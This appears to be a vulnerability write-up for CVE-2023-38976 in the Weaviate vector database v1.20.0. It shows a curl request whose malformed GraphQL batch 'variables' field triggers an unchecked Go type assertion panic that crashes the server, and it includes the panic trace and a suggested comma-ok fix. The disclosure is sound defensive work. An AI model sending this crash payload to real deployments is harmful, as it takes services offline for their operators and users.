1. CVE-2023-38976

Version: v.1.20.0

Run the server with anonymous access enabled, so the request below is accepted without credentials: AUTHENTICATION_ANONYMOUS_ACCESS_ENABLED=true PERSISTENCE_DATA_PATH=/r3p/vdb/wea/ ./weaviate-server --port=8080 --scheme=http

send curl -X POST -H 'Content-Type: application/json' -d '[{"operationName":"r3","query":"r3","variables":[1337]}]' <http://127.0.0.1:8080/v1/graphql/batch>

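If Variables is not a map[string]interface{} (that is, the "variables" field of a batch entry is not a JSON object), the unchecked type assertion below panics. In the request above "variables" is a JSON array, which decodes to []interface{}. The trace shows the panic in a goroutine created by the handler rather than in the request goroutine itself, so it appears not to be caught by the HTTP server's per-request recovery and takes the whole process down, making this a denial-of-service condition.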

//handlers_graphql.go:222 
    // Unchecked (single-value) type assertion: it panics whenever the dynamic
    // type of Variables is anything other than map[string]interface{}, for
    // example the []interface{} reported in the panic message below.
    // NOTE(review): Variables is presumably decoded straight from the request
    // body, so its shape is caller-controlled; confirm against the decoder.
    // The defensive form is the comma-ok assertion,
    //   v, ok := unbatchedRequest.Variables.(map[string]interface{})
    // with the batch entry rejected as a client error when ok is false.
    if unbatchedRequest.Variables != nil {
      variables = unbatchedRequest.Variables.(map[string]interface{})
    }

panic: interface conversion: interface {} is []interface {}, not map[string]interface {}

goroutine 2111 [running]:
github.com/weaviate/weaviate/adapters/handlers/rest.handleUnbatchedGraphQLRequest({0x1c0b108, 0xc005a6ba10}, 0x14800000735?, {0x1bfb8a0, 0xc000564000}, 0xc005a6b8c0, 0x0, 0xc0004c48b8, 0xc0028bcd98)
        /r3p/vdb/wea/wea1200/adapters/handlers/rest/handlers_graphql.go:222 +0x6ee
created by github.com/weaviate/weaviate/adapters/handlers/rest.setupGraphQLHandlers.func2
        /r3p/vdb/wea/wea1200/adapters/handlers/rest/handlers_graphql.go:179 +0x36d

https://github.com/weaviate/weaviate/issues/3258
